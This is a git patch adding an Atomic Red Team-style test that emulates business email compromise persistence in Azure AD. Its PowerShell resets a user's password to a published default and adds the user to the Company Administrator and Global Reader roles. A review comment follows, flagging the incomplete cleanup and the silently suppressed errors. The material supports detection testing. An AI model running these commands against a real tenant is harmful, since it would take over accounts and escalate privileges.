From 48702a9d625ebfe90f1e0fa1d6331fc73dcb33e6 Mon Sep 17 00:00:00 2001
From: blueteam0ps <1480956+blueteam0ps@users.noreply.github.com>
Date: Sat, 26 Aug 2023 05:44:16 -0700
Subject: [PATCH] Adding Simulate - Post BEC persistence via user password reset followed by user added to company administrator role
---
 atomics/T1098.003/T1098.003.yaml | 76 ++++++++++++++++++++++++++++++++
 1 file changed, 76 insertions(+)
diff --git a/atomics/T1098.003/T1098.003.yaml b/atomics/T1098.003/T1098.003.yaml
index d89bd1cd..cf118aec 100644
--- a/atomics/T1098.003/T1098.003.yaml
+++ b/atomics/T1098.003/T1098.003.yaml
@@ -39,3 +39,79 @@ atomic_tests:
 Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
 name: powershell
 elevation_required: false
+- name: Simulate - Post BEC persistence via user password reset followed by user added to company administrator role
+ auto_generated_guid: 14f3af20-61f1-45b8-ad31-4637815f3f44
+ description: |
+ This test looks at simulating the an adversary described in the following blog post. It involves resetting the password of a normal user and adding to the company administrator role within M365.
+ Reference: https://www.huntress.com/blog/business-email-compromise-via-azure-administrative-privileges
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ auth_username:
+ description: Azure AD username used to conduct the adversary activity
+ type: string
+ default: jonh@contoso.com
+ auth_password:
+ description: Azure AD password for user auth_username
+ type: string
+ default: p4sswd
+ target_user:
+ description: Name of the user whose password be reset and added to the admin role.
+ type: string
+ default: default
+ target_password:
+ description: The password that the user target_user will be reset to.
+ type: string
+ default: Ohn05GeMe#$
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ MSOnline and AzureAD modules must be installed.
+ prereq_command: |
+ $required_mods = 'AzureAD', 'MSOnline'
+ $installed_mods = @((Get-Module $required_mods -ListAvailable -ErrorAction SilentlyContinue).Name | Select-Object -Unique)
+ $notInstalled = Compare-Object $required_mods $installed_mods -PassThru -ErrorAction SilentlyContinue
+
+ if ($notInstalled) {
+ # Prompt for installing the missing ones.
+ Write-Output "The following PS modules aren't currently installed:"
+ $notInstalled
+ exit 1
+ }
+
+ else{
+ Write-Output "All required PS modules are installed"
+ exit 0
+ }
+ get_prereq_command: |
+ Install-Module -Name MSOnline -Scope CurrentUser -Force
+ Install-Module -Name AzureAD -Scope CurrentUser -Force
+ executor:
+ command: |
+ Import-Module MSOnline
+ Import-Module AzureAD
+ $password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+ $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+ $targetsecurepw = ConvertTo-SecureString -String "#{target_password}" -AsPlainText -Force
+ Connect-MsolService -Credential $credential -ErrorAction:SilentlyContinue
+ Connect-AzureAD -Credential $credential -ErrorAction:SilentlyContinue
+
+ #Saving the ObjectId of the target_user into a variable
+ $target_objid = Get-AzureADUser -filter "userPrincipalName eq '#{target_user}'" | Select-Object -ExpandProperty ObjectId
+
+ #Reset the password of the target_user
+ Set-AzureADUserPassword -ObjectId $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue
+
+ #Adding target_user
+ Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
+ Add-MsolRoleMember -RoleName "Global Reader" -RoleMemberEmailAddress "#{target_user}"
+
+ cleanup_command: |
+ Import-Module MSOnline
+ $password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+ $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+ Connect-MsolService -Credential $credential
+ Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
+ Remove-MsolRoleMember -RoleName "Global Reader" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
+ name: powershell
+ elevation_required: false
\ No newline at end of file
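Review bot: cleanup_command only removes the two role memberships; the password reset performed by `Set-AzureADUserPassword` in the executor is never reverted, so after cleanup the target account still carries the value of target_password, whose default `Ohn05GeMe#$` is published with this file. Since the original password cannot be recovered by the test, this should at least be stated in the description, e.g. `Note: cleanup removes the role memberships only; the target user's password remains set to target_password and must be reset separately.` Separately, `Connect-MsolService`, `Connect-AzureAD` and `Set-AzureADUserPassword` all run with `-ErrorAction:SilentlyContinue`, so a failed sign-in or an unmatched target_user (the default `default` is not a UPN) leaves `$target_objid` empty and the reset fails without any signal while the `Add-MsolRoleMember` calls still run; a guard such as `if (-not $target_objid) { Write-Error "target_user not found"; exit 1 }` before the reset would make the failure visible. The name and description mention only the Company Administrator role while the command also adds Global Reader, which the description should say, and `simulating the an adversary described` reads better as `simulating the adversary activity described`.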